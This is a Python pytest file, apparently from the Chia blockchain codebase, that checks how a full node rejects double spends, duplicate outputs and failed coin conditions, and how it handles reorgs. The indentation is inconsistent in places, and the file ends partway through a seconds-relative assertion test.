] | 1 | 2021-09-03T13:06:34.000Z | 2021-09-03T13:06:34.000Z | import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from chia.consensus.blockchain import ReceiveBlockResult
from chia.protocols import full_node_protocol
from chia.types.announcement import Announcement
from chia.types.condition_opcodes import ConditionOpcode
from chia.types.condition_with_args import ConditionWithArgs
from chia.types.spend_bundle import SpendBundle
from chia.util.errors import ConsensusError, Err
from chia.util.ints import uint64
from tests.wallet_tools import WalletTool
from tests.core.full_node.test_full_node import connect_and_get_peer
from tests.setup_nodes import bt, setup_two_nodes, test_constants
from tests.util.generator_tools_testing import run_and_get_removals_and_additions
# Arbitrary puzzle hash used as a receiver/burn target in these tests.
BURN_PUZZLE_HASH = b"0" * 32
# Shared wallet and a handful of its puzzle hashes, reused by every test below.
WALLET_A = WalletTool(test_constants)
WALLET_A_PUZZLE_HASHES = [WALLET_A.get_new_puzzlehash() for _ in range(5)]
log = logging.getLogger(__name__)
@pytest.fixture(scope="session")
def event_loop():
    """Provide one shared asyncio event loop for the whole test session."""
    yield asyncio.get_event_loop()
class TestBlockchainTransactions:
@pytest.fixture(scope="function")
async def two_nodes(self):
async for _ in setup_two_nodes(test_constants):
yield _
    @pytest.mark.asyncio
    async def test_basic_blockchain_tx(self, two_nodes):
        """Farm a chain, submit a spend to the mempool, farm it into the next
        block, and verify the resulting coins are recorded unspent/non-coinbase.
        """
        num_blocks = 10
        wallet_a = WALLET_A
        coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
        receiver_puzzlehash = BURN_PUZZLE_HASH
        # Farm a chain whose farmer rewards pay to wallet_a's puzzle hash.
        blocks = bt.get_consecutive_blocks(
            num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
        )
        full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
        peer = await connect_and_get_peer(server_1, server_2)
        full_node_1 = full_node_api_1.full_node
        # Feed the entire chain to node 1.
        for block in blocks:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block), None)
        # Pick a farmer-reward coin from block 2 to spend.
        spend_block = blocks[2]
        spend_coin = None
        for coin in list(spend_block.get_included_reward_coins()):
            if coin.puzzle_hash == coinbase_puzzlehash:
                spend_coin = coin
        spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
        assert spend_bundle is not None
        # Submit the transaction over the peer connection and confirm it
        # landed in node 1's mempool.
        tx: full_node_protocol.RespondTransaction = full_node_protocol.RespondTransaction(spend_bundle)
        await full_node_api_1.respond_transaction(tx, peer)
        sb = full_node_1.mempool_manager.get_spendbundle(spend_bundle.name())
        assert sb is spend_bundle
        # Build the next block's spend bundle from the current mempool.
        last_block = blocks[-1]
        next_spendbundle, additions, removals = await full_node_1.mempool_manager.create_bundle_from_mempool(
            last_block.header_hash
        )
        assert next_spendbundle is not None
        # Farm one more block that includes the bundle and check it becomes
        # the new peak.
        new_blocks = bt.get_consecutive_blocks(
            1,
            block_list_input=blocks,
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            transaction_data=next_spendbundle,
            guarantee_transaction_block=True,
        )
        next_block = new_blocks[-1]
        await full_node_1.respond_block(full_node_protocol.RespondBlock(next_block))
        assert next_block.header_hash == full_node_1.blockchain.get_peak().header_hash
        added_coins = next_spendbundle.additions()
        # Two coins are added, main spend and change
        assert len(added_coins) == 2
        # Both new coins must be in the coin store, unspent and not coinbase.
        for coin in added_coins:
            unspent = await full_node_1.coin_store.get_coin_record(coin.name())
            assert unspent is not None
            assert not unspent.spent
            assert not unspent.coinbase
@pytest.mark.asyncio
async def test_validate_blockchain_with_double_spend(self, two_nodes):
num_blocks = 5
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_3, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
spend_bundle_double = wallet_a.generate_signed_transaction(1001, receiver_puzzlehash, spend_coin)
block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
res, err, _ = await full_node_1.blockchain.receive_block(next_block)
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.DOUBLE_SPEND
    @pytest.mark.asyncio
    async def test_validate_blockchain_duplicate_output(self, two_nodes):
        """Two identical spends of the same coin create duplicate output
        coins; the block must be rejected with Err.DUPLICATE_OUTPUT.
        """
        num_blocks = 3
        wallet_a = WALLET_A
        coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
        receiver_puzzlehash = BURN_PUZZLE_HASH
        blocks = bt.get_consecutive_blocks(
            num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
        )
        full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
        full_node_1 = full_node_api_1.full_node
        for block in blocks:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Pick a farmer-reward coin from block 2 to spend.
        spend_block = blocks[2]
        spend_coin = None
        for coin in list(spend_block.get_included_reward_coins()):
            if coin.puzzle_hash == coinbase_puzzlehash:
                spend_coin = coin
        # Same amount and receiver in both bundles -> identical output coin
        # in each, i.e. a duplicate output once aggregated.
        spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
        spend_bundle_double = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
        block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
        new_blocks = bt.get_consecutive_blocks(
            1,
            block_list_input=blocks,
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            transaction_data=block_spendbundle,
            guarantee_transaction_block=True,
        )
        next_block = new_blocks[-1]
        res, err, _ = await full_node_1.blockchain.receive_block(next_block)
        assert res == ReceiveBlockResult.INVALID_BLOCK
        assert err == Err.DUPLICATE_OUTPUT
    @pytest.mark.asyncio
    async def test_validate_blockchain_with_reorg_double_spend(self, two_nodes):
        """Reorg scenarios around a single coin spend: the coin may be spent
        once on each competing chain (at various heights), but spending it a
        second time on the same chain must fail with Err.DOUBLE_SPEND (or
        raise ConsensusError when fed through respond_block).
        """
        num_blocks = 10
        wallet_a = WALLET_A
        coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
        receiver_puzzlehash = BURN_PUZZLE_HASH
        blocks = bt.get_consecutive_blocks(
            num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
        )
        full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
        for block in blocks:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Pick a farmer-reward coin from block 2; the same spend_bundle is
        # reused for every spend attempt below.
        spend_block = blocks[2]
        spend_coin = None
        for coin in list(spend_block.get_included_reward_coins()):
            if coin.puzzle_hash == coinbase_puzzlehash:
                spend_coin = coin
        spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
        # NOTE(review): upstream versions of this test pass `blocks` as the
        # block_list_input here so the spend extends the existing chain —
        # confirm this call is not missing that argument.
        blocks_spend = bt.get_consecutive_blocks(
            1,
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            guarantee_transaction_block=True,
            transaction_data=spend_bundle,
        )
        # Move chain to height 10, with a spend at height 10
        for block in blocks_spend:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Reorg at height 5, add up to and including height 12
        new_blocks = bt.get_consecutive_blocks(
            7,
            blocks[:6],
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            guarantee_transaction_block=True,
            seed=b"another seed",
        )
        for block in new_blocks:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Spend the same coin in the new reorg chain at height 13
        new_blocks = bt.get_consecutive_blocks(
            1,
            new_blocks,
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            guarantee_transaction_block=True,
            transaction_data=spend_bundle,
        )
        res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks[-1])
        assert err is None
        assert res == ReceiveBlockResult.NEW_PEAK
        # But can't spend it twice
        new_blocks_double = bt.get_consecutive_blocks(
            1,
            new_blocks,
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            guarantee_transaction_block=True,
            transaction_data=spend_bundle,
        )
        res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks_double[-1])
        assert err is Err.DOUBLE_SPEND
        assert res == ReceiveBlockResult.INVALID_BLOCK
        # Now test Reorg at block 5, same spend at block height 12
        new_blocks_reorg = bt.get_consecutive_blocks(
            1,
            new_blocks[:12],
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            guarantee_transaction_block=True,
            transaction_data=spend_bundle,
            seed=b"spend at 12 is ok",
        )
        for block in new_blocks_reorg:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Spend at height 13 is also OK (same height)
        new_blocks_reorg = bt.get_consecutive_blocks(
            1,
            new_blocks[:13],
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            guarantee_transaction_block=True,
            transaction_data=spend_bundle,
            seed=b"spend at 13 is ok",
        )
        for block in new_blocks_reorg:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Spend at height 14 is not OK (already spend)
        new_blocks_reorg = bt.get_consecutive_blocks(
            1,
            new_blocks[:14],
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            guarantee_transaction_block=True,
            transaction_data=spend_bundle,
            seed=b"spend at 14 is double spend",
        )
        # respond_block surfaces validation failure as ConsensusError here.
        with pytest.raises(ConsensusError):
            for block in new_blocks_reorg:
                await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
    @pytest.mark.asyncio
    async def test_validate_blockchain_spend_reorg_coin(self, two_nodes):
        """Chain of dependent spends inside successive reorgs: each reorg
        block spends a coin that was created by the previous reorg block
        (receiver_1 -> receiver_2 -> receiver_3).
        """
        num_blocks = 10
        wallet_a = WALLET_A
        coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
        receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
        receiver_2_puzzlehash = WALLET_A_PUZZLE_HASHES[2]
        receiver_3_puzzlehash = WALLET_A_PUZZLE_HASHES[3]
        blocks = bt.get_consecutive_blocks(
            num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
        )
        full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
        for block in blocks:
            await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Pick a farmer-reward coin from block 2 and spend it to receiver_1
        # inside a reorg block that extends blocks[:5].
        spend_block = blocks[2]
        spend_coin = None
        for coin in list(spend_block.get_included_reward_coins()):
            if coin.puzzle_hash == coinbase_puzzlehash:
                spend_coin = coin
        spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
        new_blocks = bt.get_consecutive_blocks(
            1,
            blocks[:5],
            seed=b"spend_reorg_coin",
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            transaction_data=spend_bundle,
            guarantee_transaction_block=True,
        )
        await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
        # Find the coin just created for receiver_1 among the block's
        # additions ([1] is the additions list of the (removals, additions)
        # pair), then spend it on to receiver_2.
        coin_2 = None
        for coin in run_and_get_removals_and_additions(
            new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM, test_constants.COST_PER_BYTE
        )[1]:
            if coin.puzzle_hash == receiver_1_puzzlehash:
                coin_2 = coin
                break
        assert coin_2 is not None
        spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_2_puzzlehash, coin_2)
        new_blocks = bt.get_consecutive_blocks(
            1,
            new_blocks[:6],
            seed=b"spend_reorg_coin",
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            transaction_data=spend_bundle,
            guarantee_transaction_block=True,
        )
        await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
        # Same again: find receiver_2's coin and spend it on to receiver_3.
        coin_3 = None
        for coin in run_and_get_removals_and_additions(
            new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM, test_constants.COST_PER_BYTE
        )[1]:
            if coin.puzzle_hash == receiver_2_puzzlehash:
                coin_3 = coin
                break
        assert coin_3 is not None
        spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_3_puzzlehash, coin_3)
        new_blocks = bt.get_consecutive_blocks(
            1,
            new_blocks[:7],
            seed=b"spend_reorg_coin",
            farmer_reward_puzzle_hash=coinbase_puzzlehash,
            transaction_data=spend_bundle,
            guarantee_transaction_block=True,
        )
        await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_cb_coin(self, two_nodes):
num_blocks = 15
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spends a coinbase created in reorg
new_blocks = bt.get_consecutive_blocks(
5,
blocks[:6],
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = new_blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_since_genesis(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1, blocks, seed=b"", farmer_reward_puzzle_hash=coinbase_puzzlehash, transaction_data=spend_bundle
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
# Spends a coin in a genesis reorg, that was already spent
new_blocks = bt.get_consecutive_blocks(
12,
[],
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_assert_my_coin_id(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
spend_block = blocks[2]
bad_block = blocks[3]
spend_coin = None
bad_spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
for coin in list(bad_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
bad_spend_coin = coin
valid_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [spend_coin.name()])
valid_dic = {valid_cvp.opcode: [valid_cvp]}
bad_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [bad_spend_coin.name()])
bad_dic = {bad_cvp.opcode: [bad_cvp]}
bad_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, bad_dic)
valid_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, valid_dic)
assert bad_spend_bundle is not None
assert valid_spend_bundle is not None
# Invalid block bundle
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bad_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_MY_COIN_ID_FAILED
# Valid block bundle
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=valid_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_coin_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_COIN_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.name(), b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_COIN_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_puzzle_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_PUZZLE_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.puzzle_hash, b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_PUZZLE_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_height_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 10
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_ABSOLUTE, [int_to_bytes(10)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 10
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_ABSOLUTE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 11, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_height_relative(self, two_nodes):
num_blocks = 11
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 11
# This condition requires block1 coinbase to be spent more than 10 block after it was farmed
# block index has to be greater than (2 + 9 = 11)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_RELATIVE, [int_to_bytes(9)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 11
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_RELATIVE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 12, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_relative(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent 300 seconds after coin creation
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_RELATIVE, [int_to_bytes(300)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent to early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 300 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
